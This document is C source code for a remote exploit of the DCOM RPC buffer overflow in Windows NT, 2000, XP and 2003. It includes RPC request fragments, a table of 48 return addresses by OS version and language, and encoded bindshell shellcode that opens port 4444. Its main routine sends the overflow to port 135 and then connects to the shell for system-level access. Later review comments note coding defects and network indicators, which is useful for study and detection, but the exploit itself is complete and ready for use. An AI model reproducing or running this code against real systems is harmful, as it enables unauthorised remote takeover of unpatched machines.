
  1. /*
  2.   DCOM RPC Overflow Discovered by LSD
  3.    -> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom
  4.    
  5.   Based on FlashSky/Benjurry's Code
  6.    -> http://www.xfocus.org/documents/200307/2.html
  7.    
  8.   Written by H D Moore <hdm [at] metasploit.com>
  9.    -> http://www.metasploit.com/
  10.   
  11.   Based on K-Otik Security's Code
  12.    -> http://www.k-otik.com
  13.  
  14.   Added Offsets from K-Otiks code (nuttso) 
  15.    -> nuttso@EFnet
  16.     
  17.   - Usage: ./dcom <Target ID> <Target IP>
  18.   - Targets:
  19.   -          enough still..
  20.  
  21.  
  22.   - ./HACK doesn't make you elite, nice try kids
  23.  
  24.  
  25.    shoutouts: aXe, skz, dizee, dennis, xen, stratx
  26.  
  27.    OSS IS TEH GAY
  28.  
  29. */
  30.  
  31. #include <stdio.h>
  32. #include <stdlib.h>
  33. #include <error.h>
  34. #include <sys/types.h>
  35. #include <sys/socket.h>
  36. #include <netinet/in.h>
  37. #include <arpa/inet.h>
  38. #include <unistd.h>
  39. #include <netdb.h>
  40. #include <fcntl.h>
  41. #include <unistd.h>
  42.  
/*
 * First message main() writes to the TCP/135 connection, sent unmodified
 * via send(sock, bindstr, sizeof(bindstr), 0). The name and the leading
 * bytes (0x05 0x00 0x0B) are consistent with a DCE/RPC bind PDU header
 * (version 5, packet type 11) -- TODO confirm against the protocol spec.
 * Because it is a fixed byte string, it is exactly the kind of content a
 * network signature for this traffic can key on.
 */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  49.  
/*
 * Largest fragment of the second message. main() copies it to the start of
 * buf2 and then adds (sizeof(sc) - 0xc) to 32-bit fields at fixed byte
 * offsets 8, 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0 and 0x18c of buf2, all of
 * which land inside this fragment; presumably those are length/size fields
 * that must account for the payload appended after it -- TODO confirm.
 * The array itself is never written; only the copy in buf2 is patched.
 */
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
  106.  
/*
 * 16-byte fragment placed in buf2 directly after request1. Unlike the other
 * fragments, main() patches this array IN PLACE: it adds sizeof(sc)/2 to the
 * values at offsets 0 and 8 through an (unsigned long *) cast before copying.
 * NOTE(review): on an LP64 platform that cast reads and writes 8 bytes, so
 * the store at offset 8 covers bytes 8..15 and the store at offset 0 clobbers
 * bytes 4..7 -- the code assumes a 4-byte unsigned long (ILP32). Because the
 * array is global, the adjustment persists for the rest of the process.
 */
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
  110.  
/*
 * Fragment copied into buf2 immediately after sc, unmodified. Every second
 * byte is 0x00 and the array ends in 0x00,0x00, which is consistent with a
 * NUL-terminated UTF-16LE string -- TODO confirm; the bytes are not decoded
 * anywhere in this listing.
 */
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  117.  
  118.  
  119.  
/*
 * Human-readable labels for the 48 entries of offsets[] below; the two
 * arrays are aligned by index. The trailing NULL terminates the usage loop
 * in main(), which prints "<index>\t<label>" for each entry.
 *
 * NOTE(review): declared as unsigned char * but initialised from plain
 * string literals (char *), a pointer-type mismatch compilers warn about.
 * Indices 30, 31 and 32 carry the identical label "Win2k sp1 (Kenya)" while
 * mapping to three different offsets, so the label alone does not identify
 * an entry.
 */
unsigned char *targets [] =
        {
    "winNT sp4 (english)",
    "WinNT sp5 (china)",
    "WinNT sp6 (china)",
    "WinNT sp6a (china)",
    "Win2k nosp ver 5.00.2195 (polish)",
    "Win2k sp3 - ver 5.00.2195 tested (polish)",
    "win2k sp4 (spanish)",
    "Win2k nosp 1 (english)",
    "Win2k nosp 2 (english)",
    "Win2k sp1 (english)",
    "Win2k sp2 1 (english)",
    "Win2k sp2 2 (english)",
    "Win2k sp3 1 (english)",
    "Win2k sp3 2 (english)",
    "win2k sp4 (english)",
    "win2k nosp (china)",
    "Win2k sp1 (china)",
    "Win2k sp2 (china)",
    "Win2k sp3 (china)",
    "Win2k sp4 (china)",
    "Win2k sp3 (german)",
    "Win2k nosp (japan)",
    "Win2k sp1 (japan)",
    "Win2k sp2 (japan)",
    "Win2k nosp (Korea)",
    "Win2k sp1 (Korea/same as jp)",
    "Win2k sp2 (Korea)",
    "Win2k nosp (Mexico)",
    "Win2k sp1 (Mexico)",
    "Win2k sp1 (Kenya)",
    "Win2k sp1 (Kenya)",
    "Win2k sp1 (Kenya)",
    "WinXP nosp ver 5.1.2600 (english)",
    "WinXP sp1 1 (english)",
    "WinXP sp1 2 (english)",
    "WinXP sp2 (english)",
    "Win2k3 (english)",
    "Win2k sp3 (German)",
    "Win2k sp4 1 (German)",
    "Win2k sp4 2 (German)",
    "WinXP sp1 (German)",
    "Win2k Server SP1 (french)",
    "Win2k Server SP4 (french)",
    "WinXP no sp (french)",
    "WinXP sp1 (french)",
    "Win2k sp3 big (english?)",
    "Win2k sp4 big (english?)",
    "WinXP sp01 big (english?)",
    NULL
        };
  172.         
/*
 * 48 per-target values, index-aligned with targets[] above. main() selects
 * one with the unchecked atoi() result of argv[1] and memcpy()s its first
 * four bytes over the "\xff\xff\xff\xff" placeholder in sc.
 *
 * NOTE(review): this array has no terminator, so a range check must use
 * the NULL in targets[] or sizeof(offsets)/sizeof(offsets[0]); main()
 * currently performs no check at all. Entry 18 (0x41424344, ASCII "ABCD")
 * looks like a placeholder rather than a real value -- TODO confirm.
 */
unsigned long offsets [] = 
        {
    0x77f327e5,
    0x77eedacf,
    0x77f00eac,
    0x77f0eac3,
    0x77e33f4d,
    0x77e42c29,
    0x77a53b13,
    0x77e81674,
    0x77e33f6d,
    0x77e829ec,
    0x77e2492b,
    0x77e824b5,
    0x77e8367a,
    0x772efa5c,
    0x77f92a9b,
    0x77e2e32a,
    0x77e6898b,
    0x77e0492b,
    0x41424344,
    0x77df4c29,
    0x772e887a,
    0x77f327e5,
    0x77e5898b,
    0x77df492b,
    0x77e1e32a,
    0x77e5898b,
    0x77df492b,
    0x77e1e32a,
    0x77e8898b,
    0x77e33f4d,
    0x77e8898b,
    0x77e2492b,
    0x77e9afe3,
    0x77e626ba,
    0x77d737db,
    0x777d73bd,
    0x772254b0,
    0x77e32c29,
    0x77e04c29,
    0x77e2c256,
    0x77d418fc,
    0x77e43e4b,
    0x77e2c256,
    0x77d4754a,
    0x77d418fc,
    0x77aa2b25,
    0x77df4c29,
    0x71a17bfb,
        };
  224.  
/*
 * Payload buffer, written as one concatenated string literal. main()
 * overwrites the four bytes at sc+36 (the "\xff\xff\xff\xff" placeholder
 * below) with the selected offsets[] entry, then copies the whole array into
 * buf2 between request2 and request3. Every length adjustment in main()
 * is derived from sizeof(sc), which -- because this is a string literal --
 * includes the implicit trailing NUL byte. The "port 4444" comment matches
 * the second connection main() attempts after sending, which is the
 * follow-on indicator a network monitor would look for.
 */
unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */
    
    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* port 4444 bindshell */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
  278.  
  279.    
  280.  
/*
 * Final fragment of the second message, copied into buf2 after request3
 * without modification. Nothing in main() patches its bytes.
 */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
  287.  
  288.  
  289. /* ripped from TESO code */
/*
 * Relay loop between this process's stdin/stdout (fds 0 and 1) and sock:
 * data readable on fd 0 is written to sock, data readable on sock is
 * written to fd 1, 512 bytes at a time. Never returns -- it exit()s the
 * whole process with EXIT_FAILURE on EOF or a read error on either side.
 *
 * NOTE(review): rfds is never FD_ZERO()ed, so the fd_set is used with
 * indeterminate contents on the first iteration. The return values of
 * select() and both write() calls are ignored, so an interrupted select()
 * or a short write goes unnoticed. select()/fd_set normally come from
 * <sys/select.h>, which this listing does not include directly -- it
 * relies on another header pulling it in; TODO confirm on the target libc.
 */
void shell (int sock)
{
        int     l;
        char    buf[512];
        fd_set  rfds;


        while (1) {
                /* select() clears descriptors that were not ready, so both
                 * bits are re-armed on every pass; there is no FD_ZERO. */
                FD_SET (0, &rfds);
                FD_SET (sock, &rfds);

                select (sock + 1, &rfds, NULL, NULL, NULL);
                if (FD_ISSET (0, &rfds)) {
                        l = read (0, buf, sizeof (buf));
                        /* 0 = EOF on stdin, <0 = read error: both end the process */
                        if (l <= 0) {
                                printf("\n - Connection closed by local user\n");
                                exit (EXIT_FAILURE);
                        }
                        write (sock, buf, l);
                }

                if (FD_ISSET (sock, &rfds)) {
                        l = read (sock, buf, sizeof (buf));
                        if (l == 0) {
                                printf ("\n - Connection closed by remote host.\n");
                                exit (EXIT_FAILURE);
                        } else if (l < 0) {
                                printf ("\n - Read failure\n");
                                exit (EXIT_FAILURE);
                        }
                        write (1, buf, l);
                }
        }
}
  324.  
  325.  
/*
 * Entry point. argv[1] is an index into offsets[], argv[2] a dotted-quad
 * address passed to inet_addr(). The function assembles buf2 from
 * request1 + request2 + sc + request3 + request4, patches several 32-bit
 * fields in place, sends bindstr and then buf2 over a TCP/135 connection,
 * closes it, sleeps one second, and then tries TCP/4444 on the same
 * address; a successful second connect() is handed to shell(), which never
 * returns. Every other path, including the error paths, returns 0, so the
 * exit status does not distinguish success from failure.
 *
 * NOTE(review): memcpy() is called without a visible <string.h> include
 * (an implicit declaration under older C dialects); the stores through
 * (unsigned long *) casts assume a 4-byte unsigned long and disregard
 * alignment and strict-aliasing rules; the argv[1] index is never range
 * checked; inet_addr() and recv() results are not checked.
 */
int main(int argc, char **argv)
{
    
    int sock;
    int len,len1;
    unsigned int target_id;
    unsigned long ret;
    struct sockaddr_in target_ip;   /* NOTE(review): never zeroed, so sin_zero is left indeterminate */
    unsigned short port = 135;
    unsigned char buf1[0x1000];     /* receive scratch; only 1000 bytes are ever read into it */
    unsigned char buf2[0x1000];     /* assembled second message */

    printf("---------------------------------------------------------\n");
    printf("- Remote DCOM RPC Buffer Overflow Exploit\n");
    printf("- Original code by FlashSky and Benjurry\n");
    printf("- Rewritten by HDM <hdm [at] metasploit.com>\n");
    printf("- 48 targets by nuttso <sendpackets [at] hotmail.com>\n");


    if(argc<3)
    {
        printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
        printf("- Targets:\n");
        /* targets[] is NULL-terminated; offsets[] is not, so this is the only usable bound */
        for (len=0; targets[len] != NULL; len++)
        {
            printf("-          %d\t%s\n", len, targets[len]);
        }
        printf("\n");
        exit(1);
    }

    /* yeah, get over it :) */
    /* NOTE(review): no range check -- an id of 48 or more, or a negative
     * atoi() result (which wraps when stored in the unsigned target_id),
     * reads past the end of offsets[]. */
    target_id = atoi(argv[1]);
    ret = offsets[target_id];
    
    /* NOTE(review): %x expects unsigned int but ret is unsigned long -- mismatched on LP64 */
    printf("- Using return address of 0x%.8x\n", ret);

    /* overwrite the "\xff\xff\xff\xff" placeholder in sc with the first
     * four bytes of ret's in-memory representation (host byte order) */
    memcpy(sc+36, (unsigned char *) &ret, 4);

    /* first connection: TCP/135. inet_addr() failure (INADDR_NONE) is not detected here */
    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(argv[2]);
    target_ip.sin_port = htons(port);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("- Socket");
        return(0);
    }
    
    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
        perror("- Connect");
        return(0);
    }
    
    len=sizeof(sc);  /* unused: len is overwritten by recv() below */
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    
    /* adjust the two fields at request2+0 and request2+8 IN the global array
     * (presumably lengths covering the appended payload -- TODO confirm).
     * NOTE(review): 8-byte stores on LP64; the code assumes ILP32. */
    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
    
    /* concatenate the remaining fragments; len1 tracks the running total.
     * No check that the sum fits in the 0x1000-byte buf2 -- it happens to,
     * with the array sizes in this listing. */
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    
    /* the same (sizeof(sc) - 0xc) adjustment applied to fixed offsets inside
     * the request1 portion of buf2; the originals in request1[] are untouched */
    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
    

    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
    
    /* bindstr goes out unmodified and is the first thing on the wire */
    if (send(sock,bindstr,sizeof(bindstr),0)== -1)
    {
            perror("- Send");
            return(0);
    }
    /* NOTE(review): whatever the peer answers is read but neither the
     * byte count nor the contents are examined; -1 is not handled either */
    len=recv(sock, buf1, 1000, 0);
    
    if (send(sock,buf2,len1,0)== -1)
    {
            perror("- Send");
            return(0);
    }
    close(sock);
    sleep(1);
    
    /* second connection: TCP/4444 on the same address. For defenders this
     * follow-on connect is a distinct network indicator from the 135 traffic. */
    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(argv[2]);
    target_ip.sin_port = htons(4444);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("- Socket");
        return(0);
    }
    
    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
        printf("- Exploit appeared to have failed.\n");
        return(0);
    }
    
    printf("- Dropping to System Shell...\n\n");

    /* shell() loops until EOF/error and exit()s; the return below is only
     * reached if shell() ever returned, which it does not in this listing */
    shell(sock);
    
    return(0);
}